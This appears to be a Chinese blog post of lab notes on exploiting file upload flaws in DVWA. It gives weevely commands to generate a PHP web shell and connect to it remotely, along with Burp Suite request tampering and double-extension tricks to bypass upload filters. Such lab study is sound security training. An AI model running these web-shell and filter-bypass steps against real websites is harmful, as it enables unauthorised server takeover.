4.文件上传

文件上传

1. DVWA

  • 默认登入帐号密码 admin password
  • DVWA 修改安全等级 在DVWA Security 中选择然后submit

2. 工具 weevely

  • 生成shell.php weevely generate 123456 /home/kali/shell.php在/home/kali/下生成shell.php文件,设置密码为123456

  • 在DVWA中上传shell.php

  • 远程控制 weevely http://192.168.1.104/dvwa/hackable/uploads/shell.php 123456

3. 拦截请求 Intercepting HTTP Requests

  • 工具 Burp Suite
  • 在浏览器设置代理模式,网络设置的ip与端口与Burp Suite中proxy–options–proxy listeners的ip和端口一直
  • 使用完Burp Suite后,将浏览器的代入模式关闭

4. 使用高级文件上传漏洞 Exploiting Advanced File Upload Vulnerabilities To Hack Websites

  • 设置DVWA安全模式为medium(此时DVWA无法直接上传php文件)
  • 借助Burp Suite
    1. 将php后缀改为jpg,然后上传
    2. 在Burp Suite中截获请求,将Burp Suite中proxy–intercept–intercept is on下面的Content-Disposition: form-data; name=“uploaded”; filename="shell 2.jpg"中shell 2.jpg改为shell 2.php
    3. 远程控制 weevely http://192.168.1.104/dvwa/hackable/uploads/shell2.php 123456

5. 利用更多高级文件上传漏洞 Exploiting More Advanced File Upload Vulnerabilities

  • 设置DVWA安全模式为high
  1. 在Burp Suite中将shell3.jpg改为shell3.php.jpg
  2. 远程控制
posted @ 2020-06-19 11:44  zlbingo  阅读(35)  评论(0)    收藏  举报